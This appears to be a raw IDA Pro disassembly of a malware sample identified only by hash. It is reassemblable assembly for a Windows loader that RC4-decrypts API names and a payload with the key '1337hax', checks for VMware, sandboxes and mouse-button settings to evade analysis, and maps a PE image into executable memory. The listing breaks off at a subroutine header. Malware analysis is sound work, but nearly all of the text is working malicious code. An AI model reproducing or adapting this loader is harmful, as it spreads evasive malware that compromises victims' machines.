;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 2B9C32BEE9BBEACE99639E889A8F514B
; File Name : u:\work\2b9c32bee9bbeace99639e889a8f514b_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 000022F4 ( 8948.)
; Section size in file : 00002400 ( 9216.)
; Offset to raw data for section: 00000200
; Flags C0000040: Data Readable Writable
; Alignment : default
;
; Imports from KERNEL32.dll
;
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; HGLOBAL __stdcall GlobalAlloc(UINT uFlags, SIZE_T dwBytes)
extrn GlobalAlloc:dword ; CODE XREF: sub_4012B0+F�p
; DATA XREF: sub_4012B0+F�r
; HGLOBAL __stdcall GlobalFree(HGLOBAL hMem)
extrn GlobalFree:dword ; CODE XREF: sub_4012E8+6�p
; DATA XREF: sub_4012E8+6�r
; LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2)
extrn lstrcatA:dword ; CODE XREF: sub_401998+3F�p
; DATA XREF: sub_401998+3F�r
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_401AAD+E�p
; sub_401EBA+19�p ...
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_401EBA+3B7�p
; DATA XREF: sub_401EBA+3B7�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_401EBA+38�p
; sub_401EBA+4B�p ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_401EBA+B�p
; sub_402CE6+10�p
; DATA XREF: ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_402CE6+9D�p
; DATA XREF: sub_402CE6+9D�r
; void __stdcall SetLastError(DWORD dwErrCode)
extrn SetLastError:dword ; CODE XREF: sub_402CE6+79�p
; DATA XREF: sub_402CE6+79�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_402CE6+71�p
; sub_402CE6+11C�p
; DATA XREF: ...
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 401028h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 0
a1337hax db '1337hax',0 ; DATA XREF: sub_40227F+C�o
; sub_40227F+44�o ...
; char ModuleName[]
ModuleName db 'T;Y' ; DATA XREF: sub_401EBA+6�o
; sub_40227F+7�o ...
db 0Ch, 62h, 0B0h
dd 0F7h
; char aQlVpn5uNc[]
aQlVpn5uNc db 'Q-PN5c',0 ; DATA XREF: sub_401EBA+14�o
; sub_40227F+3F�o ...
align 10h
; char ProcName[]
ProcName db 'l-@Cj' ; DATA XREF: sub_401EBA+30�o
; sub_40227F+AF�o ...
dd 0C26085F7h, 0
; char aLzS[]
aLzS@cja db 'l-@Cj' ; DATA XREF: sub_401EBA+43�o
; sub_40227F+E7�o ...
dd 0C26085F7h, 5590h
; char aLBzfs[]
aLBzfs db '}+ZFs' ; DATA XREF: sub_401EBA+56�o
; sub_40227F+11F�o ...
dd 0CD66AFFEh, 68EC63B0h, 149h
; char aSVxcvk[]
aSVxcvk db '`',0Ah ; DATA XREF: sub_401EBA+69�o
; sub_40227F+157�o ...
db 'XCv'
dd 0EE788CF2h, 66E87EB3h, 0CC762958h, 0
; char aIykdo[]
aIykdo db '|:yKd' ; DATA XREF: sub_401EBA+7C�o
; sub_40227F+18F�o ...
dd 769BFAh
; char aYNagvo[]
aYNagvo db 'y:AGV' ; DATA XREF: sub_401EBA+8F�o
; sub_40227F+1C7�o ...
dd 0D26A8AF4h, 6CA6h
; char aLPc[]
aLPc db '}+]Pc' ; DATA XREF: sub_401EBA+A2�o
; sub_40227F+1FF�o ...
; ---------------------------------------------------------------------------
jmp fword ptr [edx+48A1CF60h]
; ---------------------------------------------------------------------------
dw 71F5h
dd 0
; char aHlIepi[]
aHlIepi db 'h>ePi' ; DATA XREF: sub_401EBA+B5�o
; sub_40227F+237�o ...
dd 0EC7C9AFEh, 77E240B0h, 55h
; char aLzS[]
aLzS@cjnumRu db 'l-@Cj}ؐU',0 ; DATA XREF: sub_401EBA+C8�o
; sub_40227F+26F�o ...
align 10h
; char aLzS[]
aLzS@cjmsjY db 'l-@Cj{ĶY}',0 ; DATA XREF: sub_401EBA+DB�o
; sub_40227F+2A7�o ...
align 4
; char aM6sprt[]
aM6sprt db 'm6Prt' ; DATA XREF: sub_401EBA+EE�o
; sub_40227F+2DF�o ...
dd 0D27C8CF8h, 6AE04898h, 395Eh
; char aIlPc[]
aIlPc db 'i+]Pc' ; DATA XREF: sub_401EBA+101�o
; sub_40227F+317�o ...
; ---------------------------------------------------------------------------
jmp fword ptr [edx+48A1CF60h]
; ---------------------------------------------------------------------------
dw 71F5h
dd 0
; char aHlSxgrSmn[]
aHlSxgrSmn db 'h,XGRn',0 ; DATA XREF: sub_401EBA+114�o
; sub_40227F+34F�o ...
align 4
; char aYv0qpjg[]
aYv0qpjg db 'y0Pjg' ; DATA XREF: sub_401EBA+127�o
; sub_40227F+387�o ...
dd 6A85FFh
; char aNlBLgi[]
aNlBLgi db 'n-\Lg' ; DATA XREF: sub_401EBA+13A�o
; sub_40227F+3BF�o ...
dd 0CE7DB9FEh, 76FE48B6h, 0
; char aLzS[]
aLzS@cjSmj db 'l-@Cjj',0 ; DATA XREF: sub_401EBA+14D�o
; sub_40227F+3F7�o ...
; char aIvIe[]
aIvIe db 'i:E',0 ; DATA XREF: sub_401EBA+186�o
; sub_40227F+49F�o ...
align 10h
; char aIlAzagAb[]
aIlAzagAb db 'i+ZAgπb',0 ; DATA XREF: sub_401EBA+173�o
; sub_40227F+42F�o ...
align 10h
; char aLAzagAb[]
aLAzagAb db '}+ZAgπb',0 ; DATA XREF: sub_401EBA+160�o
; sub_40227F+467�o ...
align 10h
; char aH3pzovo[]
aH3pzovo db 'h3ZOv' ; DATA XREF: sub_401EBA+199�o
; sub_40227F+4D7�o ...
dd 0E37C9AFEh, 60EB4BA0h, 5Eh
; char aH3ipaiIijJo[]
aH3ipaiIijJo db 'h3PAijҦo' ; DATA XREF: sub_401EBA+1AC�o
; sub_40227F+50F�o ...
dw 63F8h
dd 6B254Ah
; char aH3lpve[]
aH3lpve db 'h3PVE' ; DATA XREF: sub_401EBA+1BF�o
; sub_40227F+547�o ...
dd 0C47D99F6h, 6AE45EA6h, 0D0761742h, 269667F9h, 749D2B64h
dd 1FAFh
; char aYNag[]
aYNag@ db 'y:AG@' ; DATA XREF: sub_401EBA+1D2�o
; sub_40227F+57F�o ...
dd 4E8CF7h
; char aHlIskj[]
aHlIskj db 'h>sKj',0 ; DATA XREF: sub_401EBA+1E5�o
; sub_40227F+5B7�o ...
align 10h
; char aLKNcp[]
aLKNcp db '}+\Nc' ; DATA XREF: sub_401EBA+20B�o
; sub_40227F+5EF�o ...
dd 0E46A93F2h, 0ADh
; char aIlKNcm[]
aIlKNcm db 'i+\Nc' ; DATA XREF: sub_401EBA+1F8�o
; sub_40227F+627�o ...
dd 0D56180F4h, 5FB0h
; char aKNek5uNc[]
aKNek5uNc db '[)EK5c',0 ; DATA XREF: sub_401EBA+22�o
; sub_40227F+77�o ...
align 10h
; char aLFgtt[]
aLFgtt db '}+FGt' ; DATA XREF: sub_401EBA+21E�o
; sub_40227F+65F�o ...
dd 0E06A84FAh, 0
; char aHl8geghc[]
aHl8geghc db 'h8EGh' ; DATA XREF: sub_401EBA+231�o
; sub_40227F+697�o ...
dd 4E90FEh
; char aHl8[]
aHl8@gteIcH db 'h8@Gt͈ch' ; DATA XREF: sub_401EBA+244�o
; sub_40227F+6CF�o ...
dw 44F5h
align 10h
; char aHl8pymuMv[]
aHl8pymuMv db 'h8YMuЌv',0 ; DATA XREF: sub_401EBA+257�o
; sub_40227F+707�o ...
; char LibFileName[]
LibFileName db 'ntdll.dll',0 ; DATA XREF: sub_401AAD+9�o
align 4
aVmware db 'vmware',0 ; DATA XREF: sub_402E94+EE�o
align 10h
aSandbox db 'sandbox',0 ; DATA XREF: sub_402E94+D0�o
aCurrentuser db 'CurrentUser',0 ; DATA XREF: sub_402E94+3F�o
a0: ; DATA XREF: sub_402FA9+66�o
unicode 0, <0>,0
aSwapmousebutto db 'SwapMouseButtons',0 ; DATA XREF: sub_402FA9+54�o
align 4
aControlPanelMo db 'Control Panel\Mouse',0 ; DATA XREF: sub_402FA9+2E�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012B0 proc near ; CODE XREF: sub_4012F6+14�p
; sub_401518+14�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push edi
mov eax, [ebp+arg_0]
imul eax, [ebp+arg_4]
push eax ; dwBytes
push 0 ; uFlags
call GlobalAlloc ; GlobalAlloc
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
imul ecx, [ebp+arg_0]
xor eax, eax
mov edi, [ebp+var_4]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov eax, [ebp+var_4]
pop edi
leave
retn
sub_4012B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4012E8(HGLOBAL hMem)
sub_4012E8 proc near ; CODE XREF: sub_401BD6+277�p
hMem = dword ptr 8
push ebp
mov ebp, esp
push [ebp+hMem] ; hMem
call GlobalFree ; GlobalFree
pop ebp
retn
sub_4012E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012F6 proc near ; CODE XREF: sub_40227F+11�p
; sub_40227F+49�p ...
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 118h
push esi
push edi
push 1
mov eax, [ebp+arg_8]
imul eax, 0Ah
push eax
call sub_4012B0
pop ecx
pop ecx
mov [ebp+var_118], eax
cmp [ebp+var_118], 0
jnz short loc_401327
xor eax, eax
jmp loc_401514
; ---------------------------------------------------------------------------
loc_401327: ; CODE XREF: sub_4012F6+28�j
and [ebp+var_114], 0
jmp short loc_40133D
; ---------------------------------------------------------------------------
loc_401330: ; CODE XREF: sub_4012F6+66�j
mov eax, [ebp+var_114]
inc eax
mov [ebp+var_114], eax
loc_40133D: ; CODE XREF: sub_4012F6+38�j
cmp [ebp+var_114], 0FFh
jg short loc_40135E
mov eax, [ebp+var_114]
mov cl, byte ptr [ebp+var_114]
mov [ebp+eax+var_100], cl
jmp short loc_401330
; ---------------------------------------------------------------------------
loc_40135E: ; CODE XREF: sub_4012F6+51�j
and [ebp+var_110], 0
and [ebp+var_108], 0
jmp short loc_40137B
; ---------------------------------------------------------------------------
loc_40136E: ; CODE XREF: sub_4012F6+11B�j
mov eax, [ebp+var_108]
inc eax
mov [ebp+var_108], eax
loc_40137B: ; CODE XREF: sub_4012F6+76�j
cmp [ebp+var_108], 0FFh
jg loc_401416
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_108]
xor edx, edx
div ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+edx]
mov ecx, [ebp+var_108]
movzx ecx, [ebp+ecx+var_100]
mov edx, [ebp+var_110]
add edx, eax
add ecx, edx
mov eax, ecx
cdq
mov ecx, 100h
idiv ecx
mov [ebp+var_110], edx
mov eax, [ebp+var_108]
mov al, [ebp+eax+var_100]
mov [ebp+var_104], al
mov eax, [ebp+var_108]
mov ecx, [ebp+var_110]
mov cl, [ebp+ecx+var_100]
mov [ebp+eax+var_100], cl
mov eax, [ebp+var_110]
mov cl, [ebp+var_104]
mov [ebp+eax+var_100], cl
jmp loc_40136E
; ---------------------------------------------------------------------------
loc_401416: ; CODE XREF: sub_4012F6+8F�j
and [ebp+var_108], 0
and [ebp+var_110], 0
and [ebp+var_108], 0
jmp short loc_40143A
; ---------------------------------------------------------------------------
loc_40142D: ; CODE XREF: sub_4012F6+213�j
mov eax, [ebp+var_108]
inc eax
mov [ebp+var_108], eax
loc_40143A: ; CODE XREF: sub_4012F6+135�j
mov eax, [ebp+var_108]
cmp eax, [ebp+arg_8]
jge loc_40150E
mov eax, [ebp+var_108]
cdq
mov ecx, 100h
idiv ecx
mov [ebp+var_10C], edx
mov eax, [ebp+var_10C]
movzx eax, [ebp+eax+var_100]
add eax, [ebp+var_110]
cdq
mov ecx, 100h
idiv ecx
mov [ebp+var_110], edx
mov eax, [ebp+var_10C]
mov al, [ebp+eax+var_100]
mov [ebp+var_104], al
mov eax, [ebp+var_10C]
mov ecx, [ebp+var_110]
mov cl, [ebp+ecx+var_100]
mov [ebp+eax+var_100], cl
mov eax, [ebp+var_110]
mov cl, [ebp+var_104]
mov [ebp+eax+var_100], cl
mov eax, [ebp+arg_4]
add eax, [ebp+var_108]
movsx ecx, byte ptr [eax]
mov eax, [ebp+var_10C]
movzx eax, [ebp+eax+var_100]
mov edx, [ebp+var_110]
movzx edx, [ebp+edx+var_100]
add eax, edx
cdq
mov esi, 100h
idiv esi
movzx eax, [ebp+edx+var_100]
xor ecx, eax
mov eax, [ebp+var_118]
add eax, [ebp+var_108]
mov [eax], cl
jmp loc_40142D
; ---------------------------------------------------------------------------
loc_40150E: ; CODE XREF: sub_4012F6+14D�j
mov eax, [ebp+var_118]
loc_401514: ; CODE XREF: sub_4012F6+2C�j
pop edi
pop esi
leave
retn
sub_4012F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401518 proc near ; CODE XREF: start+D2�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
shl eax, 4
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_4012B0
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_401540
xor eax, eax
jmp short locret_40156A
; ---------------------------------------------------------------------------
loc_401540: ; CODE XREF: sub_401518+22�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push 2
call dword_403190
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_4]
push [ebp+var_10]
push 2
call dword_40317C
mov eax, [ebp+var_10]
locret_40156A: ; CODE XREF: sub_401518+26�j
leave
retn
sub_401518 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40156C proc near ; CODE XREF: sub_401584+12�p
; sub_401584+A0�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax-1]
xor edx, edx
div [ebp+arg_4]
imul eax, [ebp+arg_4]
pop ebp
retn
sub_40156C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401584 proc near ; CODE XREF: sub_4016CA+A5�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov eax, [ebp+arg_8]
push dword ptr [eax+38h]
mov eax, [ebp+arg_8]
push dword ptr [eax+54h]
call sub_40156C
pop ecx
pop ecx
mov [ebp+var_4], eax
and [ebp+var_8], 0
jmp short loc_4015AD
; ---------------------------------------------------------------------------
loc_4015A6: ; CODE XREF: sub_401584:loc_4016BF�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4015AD: ; CODE XREF: sub_401584+20�j
mov eax, [ebp+arg_8]
movzx eax, word ptr [eax+6]
cmp [ebp+var_8], eax
jge loc_4016C4
mov eax, [ebp+var_8]
imul eax, 28h
mov ecx, [ebp+var_8]
imul ecx, 28h
mov edx, [ebp+arg_C]
mov eax, [edx+eax+14h]
mov edx, [ebp+arg_C]
add eax, [edx+ecx+10h]
cmp eax, [ebp+arg_4]
jbe short loc_4015E3
xor eax, eax
jmp loc_4016C7
; ---------------------------------------------------------------------------
loc_4015E3: ; CODE XREF: sub_401584+56�j
mov eax, [ebp+var_8]
imul eax, 28h
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+eax+0Ch], 0
jz short loc_40165D
mov eax, [ebp+var_8]
imul eax, 28h
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+eax+8], 0
jz short loc_401630
mov eax, [ebp+arg_8]
push dword ptr [eax+38h]
mov eax, [ebp+var_8]
imul eax, 28h
mov ecx, [ebp+var_8]
imul ecx, 28h
mov edx, [ebp+arg_C]
mov eax, [edx+eax+0Ch]
mov edx, [ebp+arg_C]
add eax, [edx+ecx+8]
push eax
call sub_40156C
pop ecx
pop ecx
mov [ebp+var_4], eax
jmp short loc_40165B
; ---------------------------------------------------------------------------
loc_401630: ; CODE XREF: sub_401584+7D�j
mov eax, [ebp+arg_8]
push dword ptr [eax+38h]
mov eax, [ebp+var_8]
imul eax, 28h
mov ecx, [ebp+var_8]
imul ecx, 28h
mov edx, [ebp+arg_C]
mov eax, [edx+eax+0Ch]
mov edx, [ebp+arg_C]
add eax, [edx+ecx+10h]
push eax
call sub_40156C
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_40165B: ; CODE XREF: sub_401584+AA�j
jmp short loc_4016BF
; ---------------------------------------------------------------------------
loc_40165D: ; CODE XREF: sub_401584+6D�j
mov eax, [ebp+var_8]
imul eax, 28h
mov ecx, [ebp+var_8]
imul ecx, 28h
mov edx, [ebp+arg_C]
mov esi, [ebp+arg_C]
mov eax, [edx+eax+8]
cmp eax, [esi+ecx+10h]
jnb short loc_40169D
mov eax, [ebp+arg_8]
push dword ptr [eax+38h]
mov eax, [ebp+var_8]
imul eax, 28h
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax+8]
call sub_40156C
pop ecx
pop ecx
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
jmp short loc_4016BF
; ---------------------------------------------------------------------------
loc_40169D: ; CODE XREF: sub_401584+F3�j
mov eax, [ebp+arg_8]
push dword ptr [eax+38h]
mov eax, [ebp+var_8]
imul eax, 28h
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax+8]
call sub_40156C
pop ecx
pop ecx
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
loc_4016BF: ; CODE XREF: sub_401584:loc_40165B�j
; sub_401584+117�j
jmp loc_4015A6
; ---------------------------------------------------------------------------
loc_4016C4: ; CODE XREF: sub_401584+33�j
mov eax, [ebp+var_4]
loc_4016C7: ; CODE XREF: sub_401584+5A�j
pop esi
leave
retn
sub_401584 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4016CA proc near ; CODE XREF: sub_401E5B+20�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 18h
push esi
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
cmp [ebp+arg_4], 40h
jnb short loc_4016E4
xor eax, eax
jmp loc_401984
; ---------------------------------------------------------------------------
loc_4016E4: ; CODE XREF: sub_4016CA+11�j
mov eax, [ebp+var_18]
movzx eax, word ptr [eax]
cmp eax, 5A4Dh
jz short loc_4016F8
xor eax, eax
jmp loc_401984
; ---------------------------------------------------------------------------
loc_4016F8: ; CODE XREF: sub_4016CA+25�j
mov eax, [ebp+var_18]
mov eax, [eax+3Ch]
add eax, 0F8h
cmp [ebp+arg_4], eax
jge short loc_40170F
xor eax, eax
jmp loc_401984
; ---------------------------------------------------------------------------
loc_40170F: ; CODE XREF: sub_4016CA+3C�j
mov eax, [ebp+var_18]
mov ecx, [ebp+var_18]
add ecx, [eax+3Ch]
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
cmp dword ptr [eax], 4550h
jz short loc_40172D
xor eax, eax
jmp loc_401984
; ---------------------------------------------------------------------------
loc_40172D: ; CODE XREF: sub_4016CA+5A�j
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+16h]
and eax, 2000h
test eax, eax
jnz short loc_401751
xor eax, eax
test eax, eax
jnz short loc_401751
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+14h]
cmp eax, 0E0h
jz short loc_401758
loc_401751: ; CODE XREF: sub_4016CA+71�j
; sub_4016CA+77�j
xor eax, eax
jmp loc_401984
; ---------------------------------------------------------------------------
loc_401758: ; CODE XREF: sub_4016CA+85�j
mov eax, [ebp+var_8]
add eax, 0F8h
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+var_8]
push [ebp+arg_4]
push [ebp+var_18]
call sub_401584
add esp, 10h
mov ecx, [ebp+arg_14]
mov [ecx], eax
mov eax, [ebp+arg_14]
cmp dword ptr [eax], 0
jnz short loc_40178B
xor eax, eax
jmp loc_401984
; ---------------------------------------------------------------------------
loc_40178B: ; CODE XREF: sub_4016CA+B8�j
push 40h
push 1000h
mov eax, [ebp+arg_14]
push dword ptr [eax]
push 0
call dword_4031F0
mov ecx, [ebp+arg_10]
mov [ecx], eax
mov eax, [ebp+arg_10]
cmp dword ptr [eax], 0
jz loc_401981
mov eax, [ebp+var_8]
mov eax, [eax+54h]
mov [ebp+var_14], eax
and [ebp+var_10], 0
jmp short loc_4017C6
; ---------------------------------------------------------------------------
loc_4017BF: ; CODE XREF: sub_4016CA:loc_401804�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4017C6: ; CODE XREF: sub_4016CA+F3�j
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+6]
cmp [ebp+var_10], eax
jge short loc_401806
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+eax+14h], 0
jz short loc_401804
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+var_4]
mov eax, [ecx+eax+14h]
cmp eax, [ebp+var_14]
jnb short loc_401804
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+var_4]
mov eax, [ecx+eax+14h]
mov [ebp+var_14], eax
loc_401804: ; CODE XREF: sub_4016CA+116�j
; sub_4016CA+128�j
jmp short loc_4017BF
; ---------------------------------------------------------------------------
loc_401806: ; CODE XREF: sub_4016CA+106�j
push [ebp+var_14]
push [ebp+var_18]
mov eax, [ebp+arg_10]
push dword ptr [eax]
call sub_402A24
add esp, 0Ch
mov eax, [ebp+arg_10]
mov eax, [eax]
mov ecx, [ebp+arg_10]
mov ecx, [ecx]
add ecx, [eax+3Ch]
mov eax, [ebp+arg_8]
mov [eax], ecx
mov eax, [ebp+arg_8]
mov eax, [eax]
add eax, 0F8h
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov eax, [ebp+arg_8]
mov eax, [eax]
push dword ptr [eax+38h]
mov eax, [ebp+arg_8]
mov eax, [eax]
push dword ptr [eax+54h]
call sub_40156C
pop ecx
pop ecx
mov ecx, [ebp+arg_10]
mov ecx, [ecx]
add ecx, eax
mov [ebp+var_C], ecx
and [ebp+var_10], 0
jmp short loc_401868
; ---------------------------------------------------------------------------
loc_401861: ; CODE XREF: sub_4016CA:loc_40197C�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_401868: ; CODE XREF: sub_4016CA+195�j
mov eax, [ebp+arg_8]
mov eax, [eax]
movzx eax, word ptr [eax+6]
cmp [ebp+var_10], eax
jge loc_401981
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
cmp dword ptr [ecx+eax+0Ch], 0
jz short loc_4018A3
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov edx, [ebp+arg_10]
mov edx, [edx]
add edx, [ecx+eax+0Ch]
mov [ebp+var_C], edx
loc_4018A3: ; CODE XREF: sub_4016CA+1C0�j
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
cmp dword ptr [ecx+eax+10h], 0
jz loc_401956
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
push dword ptr [ecx+eax+10h]
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov edx, [ebp+var_18]
add edx, [ecx+eax+14h]
push edx
push [ebp+var_C]
call sub_402A24
add esp, 0Ch
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov edx, [ebp+var_10]
imul edx, 28h
mov esi, [ebp+arg_C]
mov esi, [esi]
mov eax, [ecx+eax+8]
cmp eax, [esi+edx+10h]
jnb short loc_40192E
mov eax, [ebp+arg_8]
mov eax, [eax]
push dword ptr [eax+38h]
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
push dword ptr [ecx+eax+10h]
call sub_40156C
pop ecx
pop ecx
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
jmp short loc_401954
; ---------------------------------------------------------------------------
loc_40192E: ; CODE XREF: sub_4016CA+23A�j
mov eax, [ebp+arg_8]
mov eax, [eax]
push dword ptr [eax+38h]
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
push dword ptr [ecx+eax+8]
call sub_40156C
pop ecx
pop ecx
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
loc_401954: ; CODE XREF: sub_4016CA+262�j
jmp short loc_40197C
; ---------------------------------------------------------------------------
loc_401956: ; CODE XREF: sub_4016CA+1E9�j
mov eax, [ebp+arg_8]
mov eax, [eax]
push dword ptr [eax+38h]
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
push dword ptr [ecx+eax+8]
call sub_40156C
pop ecx
pop ecx
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
loc_40197C: ; CODE XREF: sub_4016CA:loc_401954�j
jmp loc_401861
; ---------------------------------------------------------------------------
loc_401981: ; CODE XREF: sub_4016CA+E0�j
; sub_4016CA+1AA�j
push 1
pop eax
loc_401984: ; CODE XREF: sub_4016CA+15�j
; sub_4016CA+29�j ...
pop esi
leave
retn
sub_4016CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401987 proc near ; CODE XREF: sub_401998+16�p
; sub_401BD6:loc_401C96�p
push ebp
mov ebp, esp
xor eax, eax
cmp dword_4031D4, 0
setnz al
pop ebp
retn
sub_401987 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401998(LPCSTR lpString2)
sub_401998 proc near ; CODE XREF: sub_401BD6+1C�p
lpString1 = dword ptr -4
lpString2 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push edi
push 1
push 100h
call sub_4012B0
pop ecx
pop ecx
mov [ebp+lpString1], eax
call sub_401987
test eax, eax
jz short loc_4019E2
push 40h
pop ecx
xor eax, eax
mov edi, [ebp+lpString1]
rep stosd
push 100h
push [ebp+lpString1]
push 0
call dword_4031B4
push [ebp+lpString2] ; lpString2
push [ebp+lpString1] ; lpString1
call lstrcatA ; lstrcatA
mov eax, [ebp+lpString1]
jmp short loc_4019E4
; ---------------------------------------------------------------------------
loc_4019E2: ; CODE XREF: sub_401998+1D�j
xor eax, eax
loc_4019E4: ; CODE XREF: sub_401998+48�j
pop edi
leave
retn
sub_401998 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019E7 proc near ; CODE XREF: sub_401BD6+112�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp dword ptr [eax+0A0h], 0
jz short loc_401A0C
mov eax, [ebp+arg_0]
cmp dword ptr [eax+0A4h], 0
jz short loc_401A0C
mov [ebp+var_4], 1
jmp short loc_401A10
; ---------------------------------------------------------------------------
loc_401A0C: ; CODE XREF: sub_4019E7+E�j
; sub_4019E7+1A�j
and [ebp+var_4], 0
loc_401A10: ; CODE XREF: sub_4019E7+23�j
mov eax, [ebp+var_4]
leave
retn
sub_4019E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A15 proc near ; CODE XREF: sub_401BD6+14F�p
